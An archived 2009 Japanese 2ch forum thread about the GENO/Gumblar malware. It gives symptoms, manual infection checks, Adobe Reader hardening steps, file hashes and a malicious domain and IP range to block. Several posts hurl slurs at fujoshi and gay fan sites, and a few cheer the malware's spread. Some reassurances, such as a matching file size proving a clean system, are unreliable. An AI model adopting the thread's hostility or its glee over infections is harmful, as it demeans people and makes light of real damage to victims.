[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 05/09 21:32 / Filesize : 196 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ ★8



1 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:17:40 ]
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

前スレ
GENOウイルススレ ★7
pc11.2ch.net/test/read.cgi/sec/1242465121/

2 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:18:12 ]
KINGは業界団体に入ってない単なるジョークソフト
internet.watch.impress.co.jp/cda/news/2008/02/05/18360.html

ALWIL Software
AV-Comparatives
AV-Test.org
AVG Technologies
Avira GmbH
Bit9
BitDefender
Doctor Web, Ltd.
ESET
F-Secure Corporation
G DATA Software
Hispasec Sistemas
International Business Machines Corporation
Kaspersky Lab
McAfee, Inc.
Microsoft Corp.
Norman ASA
Panda Security
PC Tools
Sana Security
Secure Computing
Sophos Plc
Symantec Corporation
Trend Micro Incorporated
Virusbuster Ltd.

3 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:18:44 ]
また腐女子か。
キモイから規制しろ

4 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:19:03 ]
関連スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
changi.2ch.net/test/read.cgi/doujin/1242466997/

GENOウイルススレ
pc11.2ch.net/test/read.cgi/internet/1242450264/


5 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:19:23 ]
409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。



6 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:07 ]
★過去スレ
GENOウイルススレ ★7
pc11.2ch.net/test/read.cgi/sec/1242465121/
GENOウイルススレ ★5(★6)
pc11.2ch.net/test/read.cgi/sec/1242415108/
GENOウイルススレ ★5
pc11.2ch.net/test/read.cgi/sec/1242415022/
GENOウイルススレ ★4
pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★3
pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★2
pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
pc11.2ch.net/test/read.cgi/sec/1239152979/


7 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:14 ]
409 名前:geno[sage] 投稿日:2009/05/16(土) 21:18:55 ID:UNJfTOVM0
セキュリティー板じゃ同人騒ぎすぎとか言ってるが、
サイト管理人にしてみたら自分が配布元になりかねないんだから
信用問題だと思った


・・・が言えなかった。


8 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:18 ]
結局次スレたったんだな

9 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:25 ]
>>1

前スレ>>997
その両者だったらばかなやつの方がマシだろ

10 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:41 ]
腐女子は巣に帰ってください。セキュ板からのお願いです



11 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:42 ]
>>1
同人サイトの方はまずこちらを見て下さい
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
changi.2ch.net/test/read.cgi/doujin/1242466997/

同人スレの方のまとめより、まとめ見ても全然分からないって人は
とりあえずこれだけはやっとけ、自分でサイト持ってない人はとりあえずは何もしなくてよし
>最低限やるべきこと
>あなたがサイト管理者である場合、自サイトのソースをチェックし
></head>と<body>の間に入れた覚えのないjavascriptのコードが入ってるか確認してください。
>入っている場合はウィルスに感染しています。
>感染を広げないため、一刻も早くサイトを削除してください。

12 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:48 ]
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル

13 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:20:59 ]
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。

14 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:21:00 ]
雑談スレなんてイラネ

15 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:21:42 ]
腐女子って本当ネチネチしてんだな
マジクズ

16 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:15 ]
>>1

17 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:26 ]
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認

18 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:32 ]
>>9
しつもんする→わかんない
無限ループ

19 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:43 ]
前スレが腐スレヲチで終わってるんだが

20 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:50 ]
お前らほんとに腐女子好きなんだなw



21 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:53 ]
   ⊂二 ̄⌒\ シェシェ〜
          )\   ヽ         ニーーハォ!!
         /__   )   ∧∧        ノ)
        ////  /|.  / 華 \       / \   ワタシ嘘大っ嫌いアルヨ!! 
        / / / //\ \( `ハ´ )   _/ /^\)
       / / / (/   ヽ、        ⌒ ̄_/
      ( ( (/      ノ  T M / ̄     みなさん今日は大変うれしいおしらせアルヨ〜!!
                ./     /          このチャンス逃したら一生後悔するアルネ!!
                    |\                 
              / ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
              | なんと!あの!国民的大人気サクサク快適安心ソフト、ウイルスバスターが
              | 只今、無料で2カ月延長利用できるキャンペーンアルヨ〜!!!
              \________________________________

22 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:22:53 ]
とりあえずGENOの思惑は腐女子によってかなえられそうだな

次スレイランのでは?

23 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:12 ]
ドメインとIP変わったっぽいから弾いてる奴は注意な
martuz.cn
95.129.144.0/23 (95.129.144.0-95.129.145.255)

24 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:41 ]
GENO亜種が猛威振るってるな
いいぞもっとやれ

25 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:23:46 ]
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3

26 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:00 ]
>>20
セキュ板はツンデレが多いですから

27 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:09 ]
前スレがスレッドランキングに載ったぞw
セキュ板だとAVGの日本語化以来かな

28 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:27 ]
ゴキ腐リは嫌だ
可愛いおにゃのこがいいお

29 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:34 ]
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

30 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:36 ]
情報が欲しい奴は同人板に行ったほうが良い
機能してるのはあっちのスレだ



31 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:37 ]
こんなレベルの奴らに何言っても無駄だろ
ゆとり並に理解力ない上に無駄に高いプライドとかもう勝手に死んでくれと言うほかない

1 名前:自治 ◆mXx5gfarvs [] 投稿日:2009/05/09(土) 22:58:13 ID:apD2m+Ke0
同人板の自治スレです。

前スレ
【議論中】自治スレ 21@同人板
changi.2ch.net/test/read.cgi/doujin/1237720615/

【緊急!現在ウィルス爆撃被害中。怪しいファイルをダウンロードしない等の自衛に努めて下さい】

★ウイルス関係まとめサイト★
life.45.kg/sec/for_doujin.html
www9.atwiki.jp/doujin-m/
life.45.kg/sec/

【現状】
▲現在同人板を爆撃しているウィルス
・スレッド内のレスをランダムコピペ。直前の書き込みにレスをつけたり、
トリップをつけたりするものもあります。
・970を過ぎたスレを埋め立てるウイルスもいます
・ウイルスとの区別のために名前欄に「自治#自治」入力推奨

【感染すると?】
・ウイルス混入のファイル実行で感染 (スレ見ただけでは感染しないからおちけつ)
・ウィルス感染者は、同人板閲覧者や2ch閲覧者とは限りません
・専ブラによるあぼーん機能の使用推奨

・感染すると自分の知らない間に、爆撃対象のスレに連続コピペ投下
・爆撃を果たしたIDは管理側にIPを割り出され、BBQに焼かれて書き込めなくなります
※現在は共有IPでも焼かれているので、巻き込まれる・巻き込む可能性もあります

32 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:45 ]
                 _.. -――- ._
              ./  ,―――‐- ._` .
             /)  ./  /  /  ``\
           ///)ィ7T.フ厂 ̄`フi ‐-_ |〉. _人人人人人人人人人人人人人人_
          /,.=゙''"/  フl/_×// |ハハl .ト、> キャッシュ削除すればいいんだよ!!<
   /     i f ,.r='"-‐'つイ._T_i`   .r≦lハ!|`` ^^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
  /      /   _,.-‐'~| |'弋..!ノ     i'+!l |
    /   ,i   ,二ニ⊃l |' ' '  ,‐- ..__゙ー' .!l .|
   /    ノ    i l゙フ..,!l .ト、  l  `,!   .ハ.!
      ,イ「ト、  ,! ,!|.../_| |l: > .ヽ.. ィ <l   l|
     / iトヾヽ_/ ィ"\. | | \ \ー'/ ./ ,,;:`:;'゙

33 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:24:54 ]
>>27
マジ? 久しぶりだな

34 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:04 ]
確かに同人板の方がウイルスの話してるなw

35 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:10 ]
>>31
同意
もうなんか色々呆れた

36 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:38 ]
       ___
     /      \
    /   ⌒   ⌒\
  /     ,(⌒) (⌒)、\
  |     /// (__人__)/// |   日本製だってお
  \      ` ヽ_ノ   /
    ヽ    , __ , イ
    /       |_"____
   |   l..   /l´産地偽装 `l
   ヽ  丶-.,/  |________._|
   /`ー、_ノ /バスター /
            ...2009/

37 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:42 ]
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3


PC初心者なんでCRC32.MD5.SHA-1ってのがよく分からんのだが
サイズは丁度同じだった。


感染してないとみて大丈夫そうでしょうか?
お願いします。

38 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:45 ]
>>27
起動酎スキャンのAVGか

39 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:46 ]
男ツンデレなんていらねーよw
おまえら単に女の子との接し方しらないだけろ。
好きな子にイジワルする小学生から成長してないセキュ住民ワロス

40 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:47 ]
>>23
おk



41 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:52 ]
腐女子が勝手に押しかけてきて荒らしていったスレ
おまけに粘着腐女子は未だ健在

42 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:25:58 ]
踏んでしまったらしくIEがネットに繋がらなくなった
今はサブ機で2chしてる、cmdとかregeditは使える。

Windows XP用ネットワーク診断ツールの結果

前回の診断実行時刻: 05/16/09 21:23:13 ネットワーク アダプタの診断
ネットワークの場所の検出

info ホーム インターネット接続を使用します
ネットワーク アダプタの識別

error エラー 0x80070424: 指定されたサービスはインストールされたサービスとして存在しません。

HTTP、HTTPS、FTP の診断
HTTP、HTTPS、FTP の接続

warn HTTP: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (パッシブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn FTP (アクティブ): エラー 12007 (ftp.microsoft.com に接続中): The server name or address could not be resolved
warn HTTP: エラー 12007 (www.hotmail.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.microsoft.com に接続中): The server name or address could not be resolved
warn HTTPS: エラー 12007 (www.passport.net に接続中): The server name or address could not be resolved
error HTTP 接続ができませんでした。
error HTTPS 接続ができませんでした。
error FTP 接続ができませんでした。


43 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:26:01 ]
-----------同人関係の方は以下スレにてお願いします-------------

【管理も】同人サイト・GENOウィルス注意3【閲覧も】
changi.2ch.net/test/read.cgi/doujin/1242466997/

44 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:26:53 ]
このまま一般サイトに感染すれば面白いんだけどな

45 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:23 ]
>>43
今はこっちが勝手に観察して
ネタを張り付けてるやつがいるだけだろ

46 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:25 ]
腐女子腐女子言うやつらは向こう行って構ってもらえよ

47 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:26 ]
>>44
してますけど

48 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:46 ]
>>47
メシウマ!

49 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:47 ]
凄い進んでるが何か恐ろしい事でも起きたのか?

50 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:49 ]
法人サイトが感染しまくりでカオスな状況を楽しみたかったのに
この騒ぎだと月曜までに認知度上がっちゃって、web管理者が対策しちゃいそうだな



51 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:27:53 ]
>>37
とりあえずファイルサイズが一緒なら大丈夫だと思う

52 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:24 ]
>>49
トレンドマイクロいよいよピンチ

53 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:30 ]
別にホモサイトが絶滅しても一向にかまわんよ

54 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:28:51 ]
むしろ壊滅すればいいと思うよ

55 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:04 ]
30代40代のババアが「女の子」www

56 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:20 ]
>>40
間違ってるかもしらんから自分でチェックよろ
www3.atword.jp/gnome/

57 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:34 ]
腐女子はキモイだけじゃなく存在自体が邪魔だからな

58 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:29:43 ]
ノートン先生と一緒に寝るお

59 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:04 ]
実際法人サイトはどの程度影響されてるんだ?

60 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:11 ]
あぼんばっかり



61 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:21 ]
バスターまた更新キタ
4GB

62 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:22 ]
とりあえずAdobe Readerを削除すればいいんだな
ずっと使ってないしうp立てもしてないし消してもいいや

63 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:24 ]
あらゆる板から嫌悪されているのが腐女子
今ようやく理由が分かった気がする

64 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:25 ]
つーか普通は一般サイトにウイルス蔓延してもちゃんと対策するだろ
情弱ゆとり腐のサイトがことごとく壊滅するだけ

65 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:26 ]
おい同人サイト怖くていけなくなったじゃねえか
オタク引退宣言だわ

66 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:30:41 ]
>>49
ノートン先生が働いてくれない

67 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:30:45 ]
>>37
MD5いっしょだから大丈夫だろ

68 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:31:28 ]
あんだけ荒らしておいて謝罪なしとか腐女子マジキチ

69 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:11 ]
あれ…朝見たとき5だったと思ったら
なんかあったの?

70 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:17 ]
むしろ暴れてたのはν速民な気が



71 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:19 ]
>>49
マカフィー2010発売延期

72 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:49 ]
来なくて良い

73 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:32:58 ]
>>68
ほとんどここの住民が勝手に騒いでただけじゃね

74 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:00 ]
>>70
最初は腐板から勝手にリンクされて大量搬入された

75 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:12 ]
>>69
腐と戯れるひととき

76 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:16 ]
>>62
FlashPlayerも削除してくれ

77 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:16 ]
>>66
いつも通りだけどな。
そういう意味では遅くても来週には落ち着く。
マイクロソフトのパッチも出るかもな。

78 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:19 ]
>>49
ノートン先生が食中毒で運ばれた

79 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:42 ]
読者のみなさんにねらーだってバレるの嫌なので
ウイルス注意喚起文はサイトに載せません^^

80 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:33:49 ]
人の多いwiki系のとこはヤバイんじゃね?
リンクを感染サイトへの外部リンクに書き換えられまくったらアウト



81 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:08 ]
>>73
いいからお前は巣に帰れよ
迷惑なんだ、マジで。

82 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:10 ]
ノートン先生が15歳の美少女で処女だと判明した>49

83 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:22 ]
ねらーって事より腐女子って事の方がよほど恥ずかしいと思う

84 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:34:39 ]
同人サイト以外にも同盟サイトなどにも感染してるみたいです
ただ同人板にスレ立ってるおかげで同人サイトが目立っているようす

85 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:34:46 ]
>>78
先生に比べると対策済みのVBは優秀だね


86 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:19 ]
ウイルスにねらーも何もないんだけど
さすがマジキチはレベルが違うな

87 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:32 ]
vistaが最強であることが証明されたの?

88 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:33 ]
>>83
確かにホモでハアハアしてるよりは
ネラーの方がまだマシだな

89 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:35:51 ]
>>85
台湾人特有の釣りですか?

90 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:07 ]
>>69
ホモ同人が見れなくなって発狂した腐女子が大量に釣れた



91 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:13 ]
腐女子ってなんでくだらないプライド持ってるの?ゴキブリなの?

92 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:14 ]
ウイルス対策ベンダーにとっても今回の件は頭が痛いんじゃないか
有料のノートンより個人使用に限り無償のavastが活躍してさ。
「なんだ無料のウイルス対策ソフトの方が優秀じゃね」という事に気が付いて。

93 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:36:18 ]
>>87
operaもな


94 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:31 ]
ああいう一部のキチ層がいるせいで同人の奴らが変な目で見られるんじゃないの
ちゃんと正してやれよ仲間だろ

95 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:47 ]
そもそも、すでに同人サイトだけの問題ってわけでもないからなあ
MSも動いてくれなきゃ糞面倒な状況はかわらないし

>>87
亜種が沢山あるから安心できないぜ

96 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:36:51 ]
>>73
気持ち悪いな巣に帰れよゴミが

97 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:02 ]
>>94
関わりたくないしお断りします

98 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:10 ]
Adblockで*.cnと*.krのコンテンツをブロックしてたから全く気づかなかったわ


99 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:11 ]
AVG><

100 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:13 ]
久しぶりにウイルスでギャーぎゃー言ってるから
山田ウイルスみたいなすっげーのかと思ったら腐女子がグェグェ大げさに騒いでただけだったのねん



101 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:21 ]
>>92
目立たないだけで結構あるし、もちろん逆も多い。
流石に今回のはでかいけど。

102 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:26 ]
vistaを売りたいゲイツの罠なのか

103 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:37:31 ]
>>93
狐は

104 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:43 ]
>>92
4月下旬にもう感染サイト弾いてくれてたからねavastは

105 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:37:54 ]
IPの遮断ってどないすんねん

106 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:01 ]
同人と腐女子に過剰反応しすぎだろw

107 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:23 ]
荒れた原因ですから<腐女子

108 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:38:52 ]
マジキチの話はもういいから

109 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:01 ]
なんで、このスレ異常に速いの?

110 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:04 ]
小林製薬でも感染してお詫びしてるくらいなのに…



111 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:08 ]
この件、もの凄い事実に気づいてしまった・・・・
まさかとは思ったけど、なんかアレだな

112 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:27 ]
>>106
もういいから来るなよ
ホモでハアハアしてな
ここを荒らすな

113 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:35 ]
親父がよくニフあたりのFlashゲーやってるから不安だなぁ

114 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:39:48 ]
GENOもまさか殺害予告出されるとは思わなかったろうな

115 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:40:01 ]
カスペおじさんキレるよ?

116 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:40:42 ]
まさか同人同人騒いで無かったことにしようとしてるんじゃ
ないよね
GENOさん

117 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:41:37 ]
腐サイト全滅すれば良いのにな

118 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:41:38 ]
GENO「や ら な い か?」

119 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:41:43 ]
IPのブロックってどないすんねん

120 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:07 ]
またいらんところで敵を作った腐女子であった



121 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:16 ]
GENOウイルスなんてVB入れてれば全然怖くないよ


122 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:18 ]
お前ら言いすぎwwwwwwwwww
